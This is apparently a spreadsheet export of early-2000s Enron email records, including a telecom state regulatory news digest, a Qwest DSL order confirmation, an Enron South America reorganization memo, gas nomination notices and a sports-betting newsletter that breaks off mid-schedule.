CONNECTICUT -- DPUC expands Lifeline assistance in tribal areas_x000D_
_x000D_
The Department of Public Utility Control has amended its Lifeline_x000D_
plan to enhance assistance to individuals living on American_x000D_
Indian tribal lands.  The measure adds language proposed by_x000D_
Southern New England Telecommunications, which enhances_x000D_
"subscribership and infrastructure deployment" within American_x000D_
Indian communities by including a Lifeline credit of up to $30.25_x000D_
per month and reducing Link Up service connection charges to_x000D_
qualified applicants by $100._x000D_
_x000D_
The amendment follows an Oct. 5, 2000, FCC order to encourage_x000D_
increased subscribership and infrastructure rollout in tribal_x000D_
areas.  (Common Carrier docket 96-45)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
MICHIGAN -- Customers can bring complaints without counsel_x000D_
_x000D_
The Public Service Commission yesterday ruled that business and_x000D_
residential telephone customers can bring "slamming" or_x000D_
"cramming" complaints to the commission without the assistance of_x000D_
an attorney.  The PSC's ruling involved a complaint filed by_x000D_
Seaway Painting LLC against WorldCom, Inc., about a billing_x000D_
dispute._x000D_
_x000D_
The PSC dismissed the complaint, as requested by the petitioner,_x000D_
but concluded that Seaway may refile its complaint and proceed_x000D_
"with the assistance of a person of its choice, who need not be a_x000D_
licensed attorney."  The commission based its decision on a_x000D_
provision of the Michigan Telecommunications Act, which provides,_x000D_
"Hearings shall be conducted in a manner as to optimize_x000D_
expediency, convenience, and the ability of end users to bring_x000D_
and prosecute, without the assistance of counsel, complaints_x000D_
alleging [slamming or cramming] while preserving the rights of_x000D_
the parties."  (Case no. U-12863)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
OREGON -- Group criticizes AT&amp;T price hike_x000D_
_x000D_
The Qwest Communications International, Inc.-backed Oregon_x000D_
Coalition for Consumer Choice yesterday criticized AT&amp;T Corp. for_x000D_
its recent announcement of an 11% increase in consumer long_x000D_
distance rates.  "This rate hike from AT&amp;T just underscore the_x000D_
importance of bringing real competition to the Oregon long_x000D_
distance market," said Dan Lavey, coalition director._x000D_
_x000D_
The group said Qwest's entry into the Oregon interLATA (local_x000D_
access and transport area) market would save a customer who made_x000D_
only one 10-minute long distance call $2.80 per month, more than_x000D_
$33 a year, over AT&amp;T._x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
MINNESOTA -- MP Telecom upgrades network_x000D_
_x000D_
MP Telecom, the telecom subsidiary of Minnesota Power, yesterday_x000D_
announced that it has completed a major upgrade of its fiber_x000D_
optic network with dense wavelength division multiplexing_x000D_
technology.  The upgrade allows the company to increase greatly_x000D_
data capacity serve to its customers in Minneapolis-St. Paul,_x000D_
Duluth, St. Cloud, Brainerd, Grand Rapids, Hibbing, Virginia, and_x000D_
Eveleth._x000D_
_x000D_
The company also has completed a 395-mile fiber optic network_x000D_
connecting southern Minnesota to Minneapolis-St. Paul.  This_x000D_
network ties in Rochester, Owatonna, Albert Lea, Austin, Winona,_x000D_
and Red Wing._x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
MASSACHUSETTS -- CTC activates Springfield fiber network_x000D_
_x000D_
CTC Communications has activated one of its four fiber networks_x000D_
in western Massachusetts.  CTC PowerPath customers in Springfield_x000D_
currently use the network, which was purchased from a variety of_x000D_
dark fiber suppliers under a 20-year lease agreement and light up_x000D_
by Cisco System, Inc., optronics._x000D_
_x000D_
The company said it will activate fiber access to its network in_x000D_
over 60 locations throughout the New England and Mid Atlantic_x000D_
states this year._x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
GEORGIA -- AGL networks to install fiber in Atlanta_x000D_
_x000D_
AGL Networks LLC has started building a fiber network in Atlanta._x000D_
It will include 616 conduit miles in Atlanta's central business_x000D_
district and the cities of Buckhead, Galleria, and Sandy Springs._x000D_
AGL Networks is a subsidiary of AGL Resources, Inc., an energy_x000D_
services holding company that serves customers in Georgia,_x000D_
Tennessee, and Virginia._x000D_
_x000D_
_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D EN=_x000D_
D =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D_x000D_
_x000D_
To view this issue online, go to http://www.tr.com/statenews/._x000D_
_x000D_
Federal law prohibits duplication in any form, including_x000D_
electronic, without permission of the publisher._x000D_
_x000D_
TR's State NewsWire Copyright 2000, 2001 Telecommunications_x000D_
Reports International, Inc.  (ISSN 1082-9350) is transmitted each_x000D_
business day, except holidays._x000D_
_x000D_
Telecommunications Reports International, Inc._x000D_
1333 H St. NW, Suite 100-E_x000D_
Washington, DC 20005-4707_x000D_
_x000D_
_x000D_
Jennifer Erschen, E-mail: mailto:jerschen@tr.com_x000D_
Editor_x000D_
_x000D_
Gayle Kansagor, E-mail: mailto:gkansagor@tr.com_x000D_
Associate Editor-Online Publications_x000D_
_x000D_
Steve Arlowe,  E-mail: mailto:sarlowe@tr.com_x000D_
Senior Research Analyst_x000D_
_x000D_
Susan McGovern,  E-mail: mailto:smcgovern@tr.com_x000D_
Senior Telecommunications Analyst_x000D_
_x000D_
Victoria Curtis,  E-mail: mailto:vcurtis@tr.com_x000D_
Senior Research Analyst_x000D_
_x000D_
Account Services:_x000D_
Eileen Callahan (202) 312-6116, (202) 312-6065 (fax), E-mail:_x000D_
mailto:ecallahan@tr.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Mar 2002 11:31:20 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: TW imbalance summary</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hanagriff, Richard  _x000D_
Sent:	Tuesday, March 05, 2002 10:39 AM_x000D_
To:	Schoolcraft, Darrell; Scott, Donna_x000D_
Subject:	TW imbalance summary_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 05:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mwotp2@uswest.com'})</t>
  </si>
  <si>
    <t>Order Writer Information</t>
  </si>
  <si>
    <t>Thank you for placing your order for_x000D_
Qwest DSL service!_x000D_
_x000D_
You may reference your order for 5032886546_x000D_
by your billing telephone number, 5032886546._x000D_
_x000D_
During the next two weeks, we will be_x000D_
configuring and testing your phone line_x000D_
to ensure that you receive high-quality, reliable_x000D_
Qwest DSL service. It is possible that this testing_x000D_
will identify physical characteristics on your_x000D_
line that will cause your telephone line to be_x000D_
incompatible with Qwest DSL service. In this case,_x000D_
we will notify you immediately to discuss other_x000D_
options._x000D_
_x000D_
Your Qwest DSL service should be available on 4/18/2001._x000D_
_x000D_
Your order information is detailed below. Please_x000D_
keep this message for your records._x000D_
_x000D_
_x000D_
-------------------------------------------------_x000D_
Customer Account Information:_x000D_
Name:                                   AMBER SOSA_x000D_
Address:                                2505 NE 32D PL, PORTLAND_x000D_
Telephone Number:                       5032886546_x000D_
_x000D_
-------------------------------------------------_x000D_
Order Details:_x000D_
Service Type:                           Qwest DSL Select_x000D_
Contract Term:                          Month-to-Month_x000D_
ISP:                                    QWEST.NET_x000D_
_x000D_
-------------------------------------------------_x000D_
Contact and Shipping Information:_x000D_
Daytime Contact:                        Kate Symes_x000D_
Contact Telephone Number:               5034647486_x000D_
Available Hours:                        8AM 5PM_x000D_
Customer Email:                         kate.symes@enron.com_x000D_
Shipping Name:                          Kate Symes_x000D_
Shipping Street Address:                2505 NE 32nd Place_x000D_
Shipping City:                          Portland_x000D_
Shipping State:                         OR_x000D_
Shipping Zip Code:                      97212_x000D_
_x000D_
-------------------------------------------------_x000D_
Equipment Information:_x000D_
Modem:                                  Internal Intel PCI Qwest DSL Modem_x000D_
Computer Type:                          Desktop_x000D_
Computer Operating System:              Pentium Win98/2000/Me_x000D_
_x000D_
-------------------------------------------------_x000D_
Telephone Line Details:_x000D_
Wall Mounted Telephone Devices:         0_x000D_
Other Telephone Devices:                0_x000D_
_x000D_
_x000D_
-------------------------------------------------_x000D_
Installation Option:                    Self- Please do not attempt to_x000D_
                                        install your Qwest DSL modem_x000D_
                                        until 04-18-01._x000D_
_x000D_
The total price of your Qwest DSL order is displayed below._x000D_
Applicable taxes will be applied to your bill. Please_x000D_
note that if you have selected an ISP other than_x000D_
QWEST.net, you will need to contact your ISP for_x000D_
pricing information._x000D_
_x000D_
SERVICE CHARGES                    NON-RECURRING   MONTHLY_x000D_
---------------                    -------------   -------_x000D_
Qwest DSL Select, Month-to-Month_x000D_
Contract                           $69.00          $19.95_x000D_
Internet Access                    $0.00           $17.95_x000D_
Internal Intel PCI Qwest DSL Modem $150.00         $0.00_x000D_
0 Microfilter Packs of 1 Wall and_x000D_
3 Desk Microfilters                $0.00           $0.00_x000D_
----------------------------------------------------------_x000D_
TOTAL LIST PRICE:                  $219.00         $37.90_x000D_
_x000D_
SPECIAL DISCOUNTS                  NON-RECURRING   MONTHLY_x000D_
-----------------                  -------------   -------_x000D_
One Month Free Qwest DSL Service   $0.00           $0.00_x000D_
Activation Charge Waiver           ($69.00)        $0.00_x000D_
Free Qwest DSL  Modem              ($150.00)       $0.00_x000D_
_x000D_
----------------------------------------------------------_x000D_
TOTAL DISCOUNTS:                   ($219.00)       $0.00_x000D_
_x000D_
-----------------------------------------------------------_x000D_
TOTAL PRICE Qwest DSL ORDER:       $0.00           $37.90_x000D_
_x000D_
_x000D_
If you have any questions regarding your_x000D_
order, please call the appropriate customer service_x000D_
center:_x000D_
_x000D_
Residential customers call 1-800-244-1111_x000D_
Home Office customers call 1-800-898-9675_x000D_
Small Business customers call your account_x000D_
manager or call 1-800-603-6000_x000D_
Business and Government Solutions call 1-800-549-5629_x000D_
_x000D_
Once Qwest DSL has been installed in your home or office, you may also use_x000D_
the Qwest DSL Online Ordering Site to change the speed of your Qwest DSL_x000D_
service or to change your ISP.  To change your Qwest DSL service,_x000D_
please visit our ordering site at http://orderdsl.qwest.com._x000D_
Please do not respond to this e-mail.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 22:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Richard Shapiro/NA/Enron on 12/08/2000=_x000D_
=20_x000D_
06:57 AM ---------------------------_x000D_
  =20_x000D_
=09Enron North America Corp._x000D_
=09_x000D_
=09From:  David Delainey, President &amp; CEO Enron Americas                   =_x000D_
     =20_x000D_
  12/07/2000 11:53 PM_x000D_
=09_x000D_
_x000D_
Sent by: Enron Announcements_x000D_
To: ESA_Employees_x000D_
cc: =20_x000D_
_x000D_
Subject: Organizational Changes_x000D_
_x000D_
On November 8, the Office of the Chairman, issued an important communicatio=_x000D_
n,=20_x000D_
announcing significant organizational changes in Enron's worldwide=20_x000D_
operations. The purpose of this memo is to share with you the decisions tha=_x000D_
t=20_x000D_
are underway to restructure  Enron=01,s operations in South America.  The b=_x000D_
asic=20_x000D_
organizational framework has been set.=20_x000D_
_x000D_
As you know, Diomedes Christodoulou and Jim Bannantine will be assuming new=_x000D_
=20_x000D_
responsibilities within Enron. Replacing them will be Orlando Gonzalez and=_x000D_
=20_x000D_
Joe Kishkill, who will become the Co-Presidents of South America, reporting=_x000D_
=20_x000D_
to Dave Delainey and John Lavorato.  They will share overall responsibility=_x000D_
;=20_x000D_
however, Orlando=01,s focus will be on direct sales origination,=20_x000D_
commercial/government relationships and regulatory issues.  Joe=01,s focus =_x000D_
will=20_x000D_
be on wholesale origination, financial and operating performance and overal=_x000D_
l=20_x000D_
country management.  In addition, Orlando will continue as President and CE=_x000D_
O=20_x000D_
of Elektro until its ultimate sale._x000D_
_x000D_
The existing, large integrated asset base in South America (excluding=20_x000D_
Elektro) will be managed and operated by Rebecca McDonald and Jim Hughes in=_x000D_
=20_x000D_
Enron Global Assets, which is part of Enron Wholesale Services under Mark=_x000D_
=20_x000D_
Frevert. Ultimately, there will be very close coordination in both Brazil a=_x000D_
nd=20_x000D_
Argentina between Enron Americas and Enron Global Assets to ensure that our=_x000D_
=20_x000D_
reputation in South America is protected, our asset positions are being=20_x000D_
managed prudently and that commercial opportunities surrounding these asset=_x000D_
s=20_x000D_
are pursued._x000D_
_x000D_
The remaining natural gas and electrical commercial activities in South=20_x000D_
America will be organized around the highly successful North American netwo=_x000D_
rk=20_x000D_
business model.  This model employs people, market making, physical=20_x000D_
commodities, capital and assets to provide reliable, flexible and high-valu=_x000D_
e=20_x000D_
products to our customers.  It is people and intellectual capital based and=_x000D_
=20_x000D_
enjoys high rates of return on invested capital._x000D_
_x000D_
In the interest of pursuing this strategy, the following teams will report =_x000D_
to=20_x000D_
Joe and Orlando:_x000D_
=20_x000D_
The Commercial Origination team will be lead by Brett Wiggs.  The team will=_x000D_
 =20_x000D_
focus on covering South American markets, primarily Brazilian and Argentine=_x000D_
=20_x000D_
natural gas and electricity, with the following goals:_x000D_
_x000D_
? Generating new, innovative, reliable and high value products and services=_x000D_
=20_x000D_
needed by the market by utilizing our commodity, asset and capital=20_x000D_
capabilities;_x000D_
? Providing those products and services across South America and across the=_x000D_
=20_x000D_
value chain, including wholesale and retail, based upon the highest value=_x000D_
=20_x000D_
opportunity;_x000D_
? Finding structural value arbitrages in the South American market and move=_x000D_
=20_x000D_
quickly to capitalize;_x000D_
? Assisting the Risk Management and Trading organization in managing the=20_x000D_
overall risk of the organization;_x000D_
? Managing all new power and asset development opportunities in South Ameri=_x000D_
ca=20_x000D_
consistent with this strategy, and_x000D_
? Providing the Risk Management and Trading organization information and de=_x000D_
al=20_x000D_
flow._x000D_
_x000D_
The Commercial Origination team will consist of a diverse group of people w=_x000D_
ho=20_x000D_
work as a single team which bring the required skills including commodity,=_x000D_
=20_x000D_
capital, regulatory, asset, development, market, structuring, deal executio=_x000D_
n,=20_x000D_
finance and country knowledge necessary to reach our goals.=20_x000D_
_x000D_
The Trading and Risk Management team will be headed by Remi Collonges.  The=_x000D_
=20_x000D_
team will continue to develop pricing information and manage the price book=_x000D_
=20_x000D_
for the relevant energy markets in support of the wholesale and direct sale=_x000D_
s=20_x000D_
efforts.  Additionally, the team will work toward implementation of activel=_x000D_
y=20_x000D_
trading South American energy commodities.  This group will be responsible=_x000D_
=20_x000D_
for managing Enron South America=01,s overall risk and will have a direct=_x000D_
=20_x000D_
reporting relationship with John Lavorato in his role as head of the Americ=_x000D_
as=20_x000D_
risk activities._x000D_
_x000D_
The Argentine effort will be integrated into the overall South American=20_x000D_
Commercial Origination and Trading and Risk Management groups; however, we=_x000D_
=20_x000D_
will continue to maintain an Argentine office headed by Michael Guerriero. =_x000D_
=20_x000D_
_x000D_
The goal of the reorganization is to create a flat team oriented organizati=_x000D_
on=20_x000D_
that is very market and commercially focused.  The following support=20_x000D_
functions will assist the overall business objectives of the commercial tea=_x000D_
m=20_x000D_
and will report into Joe and Orlando, plus into their line functions in=20_x000D_
Houston.  The overall goal is to ensure that the South American business=20_x000D_
units have an adequate support organization to evaluate opportunities, as=_x000D_
=20_x000D_
well as manage day-to-day business and risk.  Otherwise, the Houston=20_x000D_
infrastructure will provide resources as needed to manage peak requirements=_x000D_
=20_x000D_
in South America, not unlike other businesses in Enron Americas._x000D_
_x000D_
These groups include:_x000D_
_x000D_
The Government Affairs team, which will be headed by Sergio Assad, will=20_x000D_
manage the relationships with the relevant regulatory agencies as well as=_x000D_
=20_x000D_
governmental ministries.  The primary regulatory goal will be to facilitate=_x000D_
,=20_x000D_
in the near term, substantive changes to the regulatory rules to allow a=20_x000D_
functioning wholesale traded market in Brazil and Argentina. Sergio will=20_x000D_
assume his responsibilities upon completion of the Elektro sale.  During th=_x000D_
is=20_x000D_
interim period, Jose Bestard will continue to be in charge of the regulator=_x000D_
y=20_x000D_
function.  Once Sergio makes the transition, he will also report to Rick=20_x000D_
Shapiro in Enron Government Affairs._x000D_
_x000D_
The Finance team will be headed by Britaldo Soares.  The team will manage t=_x000D_
he=20_x000D_
interface with Enron Global Finance.  Britaldo will transition from his=20_x000D_
current duties at Elektro upon completion of the Elektro sale.  Britaldo wi=_x000D_
ll=20_x000D_
also report to Joe Deffner in Enron Global Finance.  Rob Gay will be=20_x000D_
assisting Britaldo during the transition, while continuing his work on the=_x000D_
=20_x000D_
Cuiaba project._x000D_
_x000D_
The Legal team, which will be lead by Randy Young, as general counsel, and=_x000D_
=20_x000D_
John Novak, as deputy general counsel, will manage South America=01,s legal=_x000D_
=20_x000D_
requirements.  Randy and John will also report to Mark Haedicke in Enron=20_x000D_
Wholesale Services - Legal Department._x000D_
_x000D_
Miguel Padron will become Chief of Staff.  Human Resources, Information=20_x000D_
Technology, Treasury, Accounting &amp; Reporting, as well as Administration wil=_x000D_
l=20_x000D_
report to Miguel.  This will bring focus to essential, but non-commercial=_x000D_
=20_x000D_
functions, as well as more efficiently manage key matrix reporting=20_x000D_
relationships with Enron.  Miguel will also report to David Oxley in Enron=_x000D_
=20_x000D_
Wholesale Services =01) Human Resources and Wes Colwell in Enron Wholesale=_x000D_
=20_x000D_
Services =01) Business Analysis and Reporting._x000D_
_x000D_
These changes are consistent with Enron's evolving business strategy and=20_x000D_
reflect our continuing commitment to grow the company by maximizing our=20_x000D_
financial and intellectual capital.  However, in line with the new=20_x000D_
organizational structure and the near term potential for business in the=20_x000D_
region, further budget reductions will be necessary.  People directly=20_x000D_
affected will be notified shortly._x000D_
=20_x000D_
Enron is committed to continue the successful implementation of its=20_x000D_
businesses in South America.  We believe that as the markets develop, we ar=_x000D_
e=20_x000D_
uniquely positioned to leverage Enron=01,s core capabilities and create=20_x000D_
shareholder value.=20_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 07:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cwester@duke-energy.com', 'rcdouglas@duke-energy.com', 'rpreed@duke-energy.com', 'jabretz@duke-energy.com', 'djdobb@duke-energy.com', 'dcrider@duke-energy.com', 'wespeckels@duke-energy.com', 'dcspencer@duke-energy.com', 'mrcherry@duke-energy.com', 'jaurbanek@duke-energy.com', 'dfarmer@enron.com', 'briley@enron.com', 'lcspivey@duke-energy.com', 'dfbane@duke-energy.com', 'jclehman@duke-energy.com', 'carlos.j.rodriguez@enron.com', 'sbeemer@duke-energy.com'})</t>
  </si>
  <si>
    <t>REVISION:  Eastrans Nomination change effective 3/29/01</t>
  </si>
  <si>
    <t xml:space="preserve">Deliveries and redeliveries will still be 0 effective 3/29/01at 9:00 am._x000D_
However, the 7300 MMBtu/dy Fuels Cotton Valley gas will not be priced per_x000D_
the Transaction Agreement and will not flow into HPL._x000D_
----- Forwarded by Marta K Henderson/Houston/PEFS/PEC on 03/28/01 03:10 PM_x000D_
-----_x000D_
_x000D_
                    Marta K_x000D_
                    Henderson            To:     briley@enron.com, _x000D_
carlos.j.rodriguez@enron.com, Connie_x000D_
                                         Wester/EastTexas/PEFS/PEC@PEC, _x000D_
dfarmer@enron.com, Daniel C_x000D_
                    03/28/01             Rider/Houston/PEFS/PEC@PEC, Darrel _x000D_
F. Bane/EastTexas/PEFS/PEC@PEC, Donna_x000D_
                    08:07 AM             C. Spencer/GCS/CEC/PEC@PEC, Donna J _x000D_
Dobb/Houston/PEFS/PEC@PEC, John A._x000D_
                                         Bretz/GCS/CEC/PEC@PEC, John C _x000D_
Lehman/Field/PEFS/PEC@PEC, Julia A._x000D_
                                         Urbanek/GCS/CEC/PEC@PEC, Lee C. _x000D_
Spivey/Field/PEFS/PEC@PEC, Michael R._x000D_
                                         Cherry/EastTexas/PEFS/PEC@PEC, Poe _x000D_
Reed/GCS/CEC/PEC@PEC, Ronald C._x000D_
                                         Douglas/GCS/CEC/PEC@PEC, Sharon _x000D_
Beemer/Houston/PEFS/PEC@PEC, William E._x000D_
                                         Speckels/GCS/CEC/PEC@PEC_x000D_
                                         cc:_x000D_
                                         Subject:     Eastrans Nomination _x000D_
change effective 3/29/01_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Please decrease deliveries to Eastrans to 0 MMBtu/dy effective 3/29/01 and_x000D_
maintain at 0 until further notified._x000D_
_x000D_
The redeliveries will be 0 as well._x000D_
_x000D_
Fuels Cotton Valley gas will be valued per Paragraph 3 of the Contract_x000D_
Price (per MMBtu) section in the Transaction Agreement._x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 06:52:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.lewis@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'w..white@enron.com', 'wayne.vinson@enron.com', 'tom.chapman@enron.com', 'casey.evans@enron.com', 'andrea.dahlke@enron.com'})</t>
  </si>
  <si>
    <t>FW: Helping Hands</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
Too  cute to pass up!_x000D_
 _x000D_
 - ATT08055.jpg </t>
  </si>
  <si>
    <t>Wed, 12 Jun 2002 11:01:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>BNP PARIBAS Commodity Futures EIA Survey......RESULTS!!</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Here are this week's survey results._x000D_
_x000D_
AVG            +87_x000D_
AVG w/o High &amp; Low       +88_x000D_
Median              +88_x000D_
Standard Deviation   9_x000D_
# of responses                   49_x000D_
High                     +106_x000D_
Low                       +57_x000D_
AGA Last Year       +105_x000D_
_x000D_
Thank You!_x000D_
_x000D_
Anthony Carroll_x000D_
BNP PARIBAS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This message and any attachments (the "message") is_x000D_
intended solely for the addressees and is confidential. _x000D_
If you receive this message in error, please delete it and _x000D_
immediately notify the sender. Any use not in accord with _x000D_
its purpose, any dissemination or disclosure, either whole _x000D_
or partial, is prohibited except formal approval. The internet_x000D_
can not guarantee the integrity of this message. _x000D_
BNP PARIBAS (and its subsidiaries) shall (will) not _x000D_
therefore be liable for the message if modified. _x000D_
_x000D_
                ---------------------------------------------_x000D_
_x000D_
Ce message et toutes les pieces jointes (ci-apres le _x000D_
"message") sont etablis a l'intention exclusive de ses _x000D_
destinataires et sont confidentiels. Si vous recevez ce _x000D_
message par erreur, merci de le detruire et d'en avertir _x000D_
immediatement l'expediteur. Toute utilisation de ce _x000D_
message non conforme a sa destination, toute diffusion _x000D_
ou toute publication, totale ou partielle, est interdite, sauf _x000D_
autorisation expresse. L'internet ne permettant pas _x000D_
d'assurer l'integrite de ce message, BNP PARIBAS (et ses_x000D_
filiales) decline(nt) toute responsabilite au titre de ce _x000D_
message, dans l'hypothese ou il aurait ete modifie.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 09:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>training update!</t>
  </si>
  <si>
    <t>Stacey,_x000D_
_x000D_
I've taken Derivatives II and I'm signed up for VAR in Mar '01.  I am also _x000D_
going to sign up for the Power Marketing class that Mitzi just attended!_x000D_
_x000D_
Gracias senorita!!</t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 00:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edward.baughman@enron.com', 'david.oxley@enron.com', 'kevin.presto@enron.com', 'david.delainey@enron.com'})</t>
  </si>
  <si>
    <t>Re: Associate &amp; Analyst Placement</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by John J Lavorato/Corp/Enron on 06/06/2000 _x000D_
07:14 AM ---------------------------_x000D_
_x000D_
_x000D_
Charlene Jackson_x000D_
06/05/2000 08:24 PM_x000D_
To: John J Lavorato/Corp/Enron@Enron_x000D_
cc: Jeffrey A Shankman/HOU/ECT@ECT, Celeste Roberts/HOU/ECT@ECT, Shelly _x000D_
Jones/HOU/ECT@ECT, David W Delainey/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Associate &amp; Analyst Placement  _x000D_
_x000D_
John,_x000D_
_x000D_
Following are the placements that are confirmed.  Those on your list that are _x000D_
not confirmed were placed previously in other units.  It is my understanding _x000D_
that these individuals will see other areas for their development, i.e. _x000D_
origination, structuring and/or transactions.  If you have any questions _x000D_
please feel free to call x39523._x000D_
_x000D_
Gas_x000D_
_x000D_
Associates   _x000D_
Dustin Collins   _x000D_
Vikas Dwivedi   _x000D_
Li Sun    _x000D_
    _x000D_
Analysts    _x000D_
Nate Blackburn_x000D_
Sachin Gandhi_x000D_
Miguel Nasser_x000D_
_x000D_
_x000D_
Power_x000D_
_x000D_
Associates _x000D_
Doug Seaworth_x000D_
Eduardo Gil_x000D_
Pearce Hammond_x000D_
David Maskel_x000D_
Michael Kelly_x000D_
_x000D_
Analysts_x000D_
Possey Martinez_x000D_
Gary Justice_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 09:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'newsletter@sportingbetusa.com'})</t>
  </si>
  <si>
    <t>frozenset({'sportingbetusa@lists.sportingbet.com'})</t>
  </si>
  <si>
    <t>newsletter</t>
  </si>
  <si>
    <t>Between the Lines...=20_x000D_
Issue #6 ????November? 9,  2000=20_x000D_
Biweekly Newsletter from =20_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
In This Issue:_x000D_
1.?Breeders' Cup Success_x000D_
2.?Pro Points Challenge_x000D_
3.?NFL  Football Schedules_x000D_
4.?Promotions_x000D_
5.?NBA  Schedule_x000D_
6.?Inside  sportingbetUSA.com_x000D_
7.?Your Voice =20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??Breeders' Cup Success=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This  year's Breeders' Cup was a vintage affair and the busiest yet at =20_x000D_
Sportingbet USA! We had all of our phone clerks busy as bees trying  to tak=_x000D_
e=20_x000D_
all of the action spawned by the pony runs. All of our phone  lines were ti=_x000D_
ed=20_x000D_
up as horse enthusiasts were frantically calling in  to place bets on their=_x000D_
=20_x000D_
favorite picks before the next race was about  to begin. There were a lot o=_x000D_
f=20_x000D_
unexpected surprises as long shots,  such as Spain which paid 50-to-1,=20_x000D_
eclipsed the favorites. The  succession of thrilling finishes had many of o=_x000D_
ur=20_x000D_
members on the edge  of their seats, not to mention our clerks on their=20_x000D_
toes.  Congratulations to all of the big winners who were lucky -shrewd- =_x000D_
=20_x000D_
enough to reach the winners' circle._x000D_
_x000D_
-Top-_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??Pro Points Challenge=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Steve_x000D_
Operations  Manager_x000D_
_x000D_
_x000D_
_x000D_
"As operations manager of sportingbetUSA.com I'm happy  to announce that th=_x000D_
e=20_x000D_
response to our Pro Points Challenge contest  was overwhelming! We would li=_x000D_
ke=20_x000D_
to congratulate the winners of this  contest who all together took home a=_x000D_
=20_x000D_
grand total of $10,300!  For those of you out there who think nobody ever=_x000D_
=20_x000D_
wins these  contests, just take a look at the REAL people who won listed=20_x000D_
below!  On behalf of SportingbetUSA, I would like to thank all of this =20_x000D_
contest's participants for their NFL picks. Remember, you too can  win big=_x000D_
=20_x000D_
just like all of our Pro Points Challenge winners by playing  our Pro Point=_x000D_
s=20_x000D_
Derby which is a SportingbetUSA wagering exclusive.  Check out our site for=_x000D_
=20_x000D_
the details on  this very special bet and look out for other great contests=_x000D_
=20_x000D_
and  special offers coming soon for more chances to win! Your  entertainmen=_x000D_
t=20_x000D_
is our business."_x000D_
_x000D_
Kevin C. won $2,100=20_x000D_
Ramon P. won  $1,600=20_x000D_
Gary S. won $1,600=20_x000D_
Dave S. won  $5,000=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-Top-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??NFL Football Schedule=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
NFL  Schedule November 12 thru November 23, 2000_x000D_
_x000D_
All times are  EST=20_x000D_
_x000D_
Week  11_x000D_
_x000D_
Sunday, Nov. 12_x000D_
Arizona at  Minnesota, 12 p.m._x000D_
Atlanta at Detroit, 1 p.m._x000D_
Baltimore at  Tennessee, 12 p.m._x000D_
Chicago at Buffalo, 1 p.m.=20_x000D_
Cincinnati at  Dallas, 12 p.m.=20_x000D_
Green Bay at Tampa Bay, 4:15 p.m._x000D_
Kansas City  at San Francisco, 1:05 p.m._x000D_
Miami at San Diego, 1:05 p.m._x000D_
New  England at Cleveland, 1 p.m._x000D_
New Orleans at Carolina, 1  p.m._x000D_
Philadelphia at Pittsburgh, 1 p.m._x000D_
St. Louis at N.Y.  Giants, 4:15 p.m._x000D_
Seattle at Jacksonville, 1 p.m._x000D_
N.Y. Jets at  Indianapolis, 8:35 p.m._x000D_
Monday, Nov. 13 Oakland at Denver, 7  p.m._x000D_
(Open date: Washington)=20_x000D_
_x000D_
Week 12_x000D_
_x000D_
Sunday, Nov.  19_x000D_
Arizona at Philadelphia, 1 p.m._x000D_
Atlanta at San  Francisco, 1:15 p.m._x000D_
Buffalo at Kansas City, 12 p.m._x000D_
Carolina  at Minnesota, 12 p.m._x000D_
Cincinnati at New England, 1  p.m._x000D_
Cleveland at Tennessee, 12 p.m._x000D_
Dallas at Baltimore, 4:15  p.m._x000D_
Detroit at N.Y. Giants, 1 p.m._x000D_
Indianapolis at Green Bay,  12 p.m._x000D_
N.Y. Jets at Miami, 4:05 p.m._x000D_
Oakland at New Orleans,  12 p.m._x000D_
San Diego at Denver, 2:05 p.m._x000D_
Tampa Bay at Chicago,  12 p.m._x000D_
Jacksonville at Pittsburgh, 8:35 p.m._x000D_
_x000D_
_x000D_
Monday, Nov. 20_x000D_
Washington at St. Louis, 8  p.m._x000D_
